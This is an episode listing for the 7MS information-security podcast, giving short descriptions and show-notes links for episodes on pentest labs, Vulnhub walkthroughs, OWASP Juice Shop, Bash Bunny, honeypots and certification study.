    • Build your own hackin' lab for $500!
    • Good/bad training (CEH vs. OSCP)
    • Let's hack some stuff following a methodology!

    Tune in today's episode for more...


    7MS #256: AlienVault Certified System Engineer - Part 2 May 04, 2017

    So a few weeks ago I did an episode about the AlienVault Certified Security Engineer certification, and last Friday I took a stab at the test.

    I failed. It kicked my butt.

    Today I'm here to both rant about the unfairness of the test and offer you some study tips so you don't suffer a similar fate.

    P.S. - you should definitely check out this blog as it's one of the few valuable study guides I could find out there on the Interwebs.


    7MS #255: PwnPro 101 Apr 27, 2017

    I'm kicking the tires on the PwnPro which is an all-in-one wired, wireless and Bluetooth assessment and pentesting tool.

    Upon getting plugged into a network, it peers with a cloud portal and lets you assess and pentest from the comfort of your jammies back at your house! Oh, and did I mention it runs Kali on the back end? Delicious.

    Today's episode dives into some of what I've been learning about the PwnPro as I run it through its paces at work and warm it up for our first customer assessment...


    7MS #254: Bash Bunny Apr 20, 2017

    I've been working with the Bash Bunny for the past few weeks in preparation for a presentation/demo I'm doing in a few weeks. Today I want to talk about what the Bunny is, the cool things it can do, and some of my favorite payloads.

    Also, I started thinking about what conversation topics spawn from a demo of the Bunny. Specifically, I want to know how people would defend against the Bunny using AD policies, peripheral controls, etc. Check out the Hak5 thread I started about this, as it has got some great ideas.


    7MS #253: Desperately Seeking Service Accounts Apr 13, 2017

    Find the show notes here!


    7MS #252: LAPS - Local Administrator Password Solution Apr 06, 2017

    Show notes are here.


    7MS #251: Blackholing Malvertising with Pi-Hole Mar 30, 2017

    Show notes are here


    7MS #250: The PBS Telethon Episode! Mar 23, 2017

    Show notes for today's episode can be found here!


    7MS #249: AlienVault Certified Security Engineer - Part 1 Mar 16, 2017

    Show notes are here.


    7MS #248: How to Hack the 10 O'clock News Mar 09, 2017

    Show notes are here.


    7MS #247: Webapp Pentest Tool Bake-Off - Part 4 Mar 02, 2017

    Show notes are here.


    7MS #246: Webapp Pentest Tool Bake-Off - Part 3 Feb 23, 2017

    Site notes are here. Enjoy.


    7MS #245: Webapp Pentest Tool Bake-Off - Part 2 Feb 17, 2017

    Show notes are here.


    7MS #244: Webapp Pentest Tool Bake-Off - Part 1 Feb 09, 2017

    Show notes are here


    7MS #243: ZOMG Logo Design Contest! Feb 02, 2017

    Here are today's show notes!


    7MS #242: Bye Bye Dream Job - Part 4 Jan 26, 2017

    We've reached the end of this series, and I come into this final chapter bearing good news: I have a job! So in today's episode, I just wanted to kick back and share some cool things I'm working on as I ramp up in this new adventure (and that will also provide good topics for future episodes):

    Webapp pentest tool bake-off

    In the next week I'll be evaluating the following for more general/automatic webapp scans:

    • Netsparker
    • HP WebInspect
    • Qualys
    • AppSpider

    SIEM comparison

    We're looking at several tools to do both on-prem and managed SIEM solutions.

    If you've got recommendations or experiences to share I would love to hear them - please contact me. Thanks in advance!


    7MS #241: Bye Bye Dream Job - Part 3 Jan 19, 2017

    Show notes are here


    7MS #240: Bye Bye Dream Job - Part 2 Jan 12, 2017

    Show notes are here.


    7MS #239: Bye Bye Dream Job - Part 1 Jan 05, 2017

    Show notes: https://7ms.us/7ms-239-bye-bye-dream-job-part-1


    7MS #238: Network Monitoring 101 - Part 2: NMAP, Papertrailapp and OpenCanary Nov 30, 2016

    Show notes: https://7ms.us/7ms-238-network-monitoring-101-part-2-nmap-papertrailapp-and-opencanary


    7MS #237: Network Monitoring 101 - Part 1: Nessus Nov 23, 2016

    Show notes: https://7ms.us/7ms-237-network-monitoring-101-part-1-nessus


    7MS #236: From "Derp!" to Domain Admin with MOVEit Central Nov 17, 2016

    Show notes: https://7ms.us/7ms-236-from-derp-to-domain-admin-with-moveit-central


    7MS #235: Pwning Billy Madison Nov 10, 2016

    Show notes: https://7ms.us/7ms-235-pwning-billy-madison


    7MS #234: Pentesting OWASP Juice Shop - Part 5 Nov 04, 2016

    Show notes: https://7ms.us/7ms-234-pentesting-owasp-juice-shop-part5


    7MS #233: Pentesting OWASP Juice Shop - Part 4 Oct 20, 2016

    Show notes: https://7ms.us/7ms-233-pentesting-owasp-juice-shop-part-4/


    7MS #232: Pentesting OWASP Juice Shop - Part 3 Oct 13, 2016

    Show notes: https://7ms.us/7ms-232-pentesting-owasp-juice-shop-part-3


    7MS #231: Pentesting OWASP Juice Shop - Part 2 Oct 06, 2016

    Show notes: https://7ms.us/7ms-231-pentesting-owasp-juice-shop-part-2/


    7MS #230: Pentesting OWASP Juice Shop - Part 1 Sep 28, 2016

    Show notes: https://7ms.us/7ms-230-pentesting-owasp-juice-shop-part-1


    7MS #229: Intro to Docker for Pentesters Sep 22, 2016

    Show notes: https://7ms.us/7ms-229-intro-to-docker-for-pentesters


    7MS #228: Fun with Bettercap Sep 15, 2016

    Show notes: https://7ms.us/7ms-228-fun-with-bettercap/


    7MS #227: Let's Encrypt - Installing SSL Certs for Nessus and Ubiquiti Unifi Sep 07, 2016

    Show notes: https://7ms.us/7ms-227-lets-encrypt-installing-ssl-certs-for-nessus-and-ubiquiti-unifi-2/


    7MS #226: DIY $500 Pentesting Lab - Part 3 Sep 02, 2016

    Show notes: https://7ms.us/7ms-226-diy-500-pentesting-lab-part-3/


    7MS #225: DIY $500 Pentesting Lab - Part 2 Aug 24, 2016

    Show notes: https://7ms.us/7ms-225-diy-500-pentesting-lab-part-2/


    7MS #224: DIY $500 Pentesting Lab - Part 1 Aug 18, 2016

    Show notes: https://7ms.us/7ms-224-diy-500-pentesting-lab-part-1/


    7MS #223: Vulnhub Walkthrough - Tommy Boy Aug 10, 2016

    Show notes: https://7ms.us/7ms-223-vulnhub-walkthrough-tommy-boy/


    7MS #222: OFF-TOPIC - THE FINAL CHAPTER! Aug 10, 2016

    Show notes: https://7ms.us/7ms-222-off-topic-the-final-chapter/


    7MS #221: News and Links Roundup Aug 05, 2016

    Show notes: https://7ms.us/7ms-221-news-and-links-roundup/


    7MS #220: Installing Ubiquiti EdgeRouter X and AP - Part 3 Aug 02, 2016

    Show notes: https://7ms.us/7ms-220-installing-ubiquiti-edgerouter-x-and-ap-part-3/


    7MS #219: News and Links Roundup Jul 29, 2016

    Show notes: https://7ms.us/7ms-219-news-and-links-roundup/


    7MS #218: Off-TOPIC - My Top 5 Favorite and Least Favorite Things About The Division Jul 28, 2016

    Show notes: https://7ms.us/7ms-218-off-topic-my-top-5-favorite-and-least-favorite-things-about-the-division/


    7MS #217: Installing Ubiquiti EdgeRouter X and AP - Part 2 Jul 26, 2016

    Show notes: https://7ms.us/7ms-217-installing-ubiquiti-edgerouter-x-and-ap-part-2/


    7MS #216: News and Links Roundup Jul 22, 2016

    Show notes: https://7ms.us/7ms-216-news-and-links-roundup/


    7MS #215: Installing Ubiquiti EdgeRouter X and AP - Part 1 Jul 21, 2016



    7MS #214: News and Links Roundup Jul 16, 2016

    Show notes: https://7ms.us/7ms-214-news-and-links-roundup/


    7MS #213: Building a Vulnerable VM (The Prequel) Jul 12, 2016

    Show notes: https://7ms.us/7ms-213-building-a-vulnerable-vm-the-prequel/


    7MS #212: News and Links Roundup Jul 08, 2016

    Show notes: https://7ms.us/7ms-211-news-and-links-roundup/


    7MS #211: OFF-TOPIC - IT Horror Stories - Part 2 Jul 07, 2016

    Show notes: https://7ms.us/7ms-211-off-topic-it-horror-stories-part-2/


    7MS #210: Vulnhub Walkthrough - Mr. Robot Jul 04, 2016

    Show notes: https://7ms.us/7ms-210-vulnhub-walkthrough-mr-robot/


    7MS #209: News and Links Roundup Jul 01, 2016

    Show notes: https://7ms.us/7ms-209-news-and-links-roundup/


    7MS #208: OFF-TOPIC - The Jackwagon Who Stole My Drums! Jun 29, 2016

    Show notes: https://7ms.us/7ms-208-off-topic-the-jackwagon-who-stole-my-drums/


    7MS #207: Vulnhub Walkthrough - Sidney Jun 28, 2016

    Show notes: https://7ms.us/7ms-207-vulnhub-walkthrough-sidney/


    7MS #206: Vulnhub Walkthrough - Stapler Jun 20, 2016

    Show notes: https://7ms.us/7ms-206-vulnhub-walkthrough-stapler/


    7MS #205: News and Links Roundup Jun 17, 2016

    Show notes here: https://7ms.us/7ms-205-news-and-links-roundup/


    7MS #204: OFF-TOPIC - IT Horror Stories! Jun 16, 2016

    Show notes: https://7ms.us/7ms-204-off-topic-it-horror-stories/


    7MS #203: Vulnhub Walkthrough - FristiLeaks Jun 14, 2016

    Show notes: https://7ms.us/7ms-203-vulnhub-walkthrough-fristileaks/


    7MS #202: News and Links Roundup Jun 10, 2016

    Show notes: https://7ms.us/7ms-202-news-and-links-roundup/


    7MS #201: OFF-TOPIC - Audio Clip Extravaganza Jun 09, 2016

    Show notes: https://7ms.us/7ms-201-off-topic-audio-clip-extravaganza/


    7MS #200: Vulnhub Walkthrough - Milnet Jun 07, 2016

    Show notes here: https://7ms.us/7ms-200-vulnhub-walkthrough-milnet/


    7MS #199: News and Links Roundup Jun 03, 2016

    Show notes: https://7ms.us/7ms-199-news-and-links-roundup/


    7MS #198: Two Pretty Cool Pentest Stories Jun 02, 2016

    Show notes: https://7ms.us/7ms-198-two-pentest-stories/


    7MS #197: Vulnhub Walkthrough - SickOS 1.2 May 31, 2016

    Show notes: https://7ms.us/7ms-197-vulnhub-walkthrough-sickos-1-2/


    7MS #196: News and Links Roundup May 27, 2016

    Show notes here: https://7ms.us/7ms-196-news-and-links-roundup/


    7MS #195: Why AppSpider is Grinding My Gears May 25, 2016

    Show notes: https://7ms.us/7ms-195-why-appspider-is-grinding-my-gears/


    7MS #194: Vulnhub Walkthrough - Simple May 23, 2016

    Show notes here: https://7ms.us/7ms-194-vulnhub-walkthrough-simple/


    7MS #193: News and Links Roundup May 20, 2016

    Show notes here: https://7ms.us/7ms-193-news-and-links-roundup/


    7MS #192: Podcast Like Nobody's Listening and Blog Like Nobody's Reading May 19, 2016

    Show notes here: https://7ms.us/7ms-192-podcast-like-nobodys-listening/


    7MS #191: Vulnhub Walkthrough - Kevgir May 17, 2016

    Show notes: https://7ms.us/7ms-191-vulnhub-walkthrough-kevgir/


    7MS #190: Infosec News and Links Roundup May 13, 2016

    Show notes: https://7ms.us/7ms-190-infosec-news-and-links-roundup/


    7MS #189: OFFTOPIC - Reviews of The Family Fang and Tumbledown May 11, 2016

    Show notes: https://7ms.us/7ms-189-offtopic-reviews-of-the-family-fang-and-tumbledown/


    7MS #188: Vulnhub Walkthrough - DroopyCTF May 09, 2016

    Show notes: https://7ms.us/7ms-188-vulnhub-walkthrough-droopyctf/


    7MS #187: Infosec News and Links Roundup May 06, 2016

    Show notes: https://7ms.us/7ms-187-infosec-news-and-links-roundup/


    7MS #186: OFFTOPIC - Reviews of Brooklyn and The Revenant May 05, 2016

    Show notes: https://7ms.us/7ms-186-offtopic-reviews-of-brooklyn-and-the-revenant/


    7MS #185: Vulnhub Walkthrough - Lord of the Root May 03, 2016

    Show notes here: https://7ms.us/7ms-185-vulnhub-walkthrough-lord-of-the-root/


    7MS #184: Infosec News and Links Roundup Apr 29, 2016

    Show notes here: https://7ms.us/7ms-184-infosec-news-and-links-roundup/


    7MS #183: OFFTOPIC-The Invitation Apr 28, 2016

    Show notes here: https://7ms.us/7ms-183-offtopic-the-invitation/


    7MS #182: Vulnhub Walkthrough - SickOs Apr 25, 2016

    Show notes here: https://7ms.us/7ms-182-vulnhub-walkthrough-sickos/


    7MS #181: Infosec News and Links Roundup Apr 23, 2016

    Show notes here: https://7ms.us/7ms-181-infosec-news-and-links-roundup/


    7MS #180: Vulnhub Walkthrough: Skydog CTF Apr 21, 2016

    Show notes here: https://7ms.us/7ms-180-vulnhub-walkthrough-skydog-ctf/


    7MS #179: Bring New Life to an Old Mac with OSX Server Apr 19, 2016

    Show notes here: https://7ms.us/7ms-179-bring-new-life-to-an-old-mac-with-osx-server/


    7MS #178: Infosec News and Links Roundup Apr 15, 2016

    Show notes here: https://7ms.us/7ms-178-infosec-news-and-links-roundup/


    7MS #177: A Not Totally Sucky Way to Backup and Share Photos Apr 14, 2016

    Show notes are here: https://7ms.us/7ms-177-a-not-totally-sucky-way-to-backup-and-share-photos/


    7MS #176: DIY SSH Honeypot with Cowrie Apr 12, 2016

    Check out the show notes here: https://7ms.us/7ms-176-diy-ssh-honeypot-with-cowrie-2/


    7MS #175: Infosec News and Links Roundup Apr 01, 2016

    Show notes are here: https://7ms.us/7ms-175-infosec-news-and-links-roundup/


    7MS #174: DIY SSH Honeypot with Kippo - Part 2 Mar 31, 2016

    Show notes here: https://7ms.us/7ms-174-diy-ssh-honeypot-with-kippo-part-2/


    7MS #173: DIY SSH Honeypot with Kippo Mar 29, 2016

    Show notes here: https://7ms.us/7ms-173-diy-ssh-honeypot-with-kippo/


    7MS #172: Infosec News and Links Roundup Mar 29, 2016

    Show notes here: https://7ms.us/7ms-172-infosec-news-and-links-roundup/


    7MS #171: OFF-TOPIC - Easter Music Mar 24, 2016

    Show notes (actually, MUSIC notes in this case) can be found here: https://7ms.us/7ms-161-off-topic-easter-music/


    7MS #170: Pentesting in a Vacuum - Part 3 Mar 22, 2016

    Show notes are here: https://7ms.us/7ms-170-pentesting-in-a-vacuum-part-3/


    7MS #169: Infosec News and Links Roundup Mar 19, 2016

    Show notes are here: https://7ms.us/7ms-169-infosec-news-and-links-roundup/


    7MS #168: Upgrading and Securing Your Digital Ocean Ghost Blog Mar 17, 2016

    Show notes are here! Go to https://7ms.us/7ms-168-upgrading-and-securing-your-digital-ocean-ghost-blog/


    7MS #167: My Misadventures with SOAP Web Services Mar 17, 2016

    Show notes are here: https://7ms.us/7ms-167-my-first-dandy-experience-with-soap-web-services/


    7MS #166: Infosec News and Links Roundup Mar 11, 2016

    Show notes are here: https://7ms.us/7ms-166-infosec-news-and-links-roundup/


    7MS #165: DIY Podcast Mar 10, 2016

    Show notes for today's episode are right here: https://7ms.us/7ms-165-diy-podcast/


    7MS #164: Pentesting in a Vacuum - Part 2 Mar 07, 2016

    Check out the show notes for today's episode here: https://7ms.us/7ms-164-pentesting-in-a-vacuum-part-2/


    7MS #163: Infosec News and Links Roundup Mar 04, 2016

    Show notes here: https://7ms.us/7ms-163-infosec-news-and-links-roundup/


    7MS #162: OFF-TOPIC - Deadpool Mar 02, 2016

    Show notes for today's episode are here: https://7ms.us/7ms-162-off-topic-deadpool/


    7MS #161: DIY Wifi Network Graphing & Dojo Scavenger Vulnerable Webapp Feb 29, 2016

    Show notes are here - enjoy! https://7ms.us/7ms-161-diy-wifi-network-graph-and-dojo-scavenger-vulnerable-webapp/


    7MS #160: Infosec News and Links Roundup Feb 26, 2016

    Today's show notes are here: https://7ms.us/7ms-160-friday-infosec-news-and-links-roundup/


    7MS #159: OFF-TOPIC - What Size Company is Right for Me? (and a review of the Steve Jobs movie) Feb 24, 2016

    Today's show notes are here: https://7ms.us/7ms-159-off-topic-what-size-company-is-right-for-me/


    7MS #158: Pentesting in a Vacuum Feb 22, 2016

    Today's swell show notes are at: https://7ms.us/7ms-158-pentesting-in-a-vacuum/


    7MS #157: Infosec News and Links Roundup Feb 19, 2016

    Today's show notes are here: https://7ms.us/7ms-157-infosec-news-and-links-roundup/


    7MS #156: OFF-TOPIC - 3 Ways to be a More Connected Parent Feb 17, 2016

    Today's show notes: https://7ms.us/7ms-156-off-topic-3-ways-to-be-a-more-connected-parent/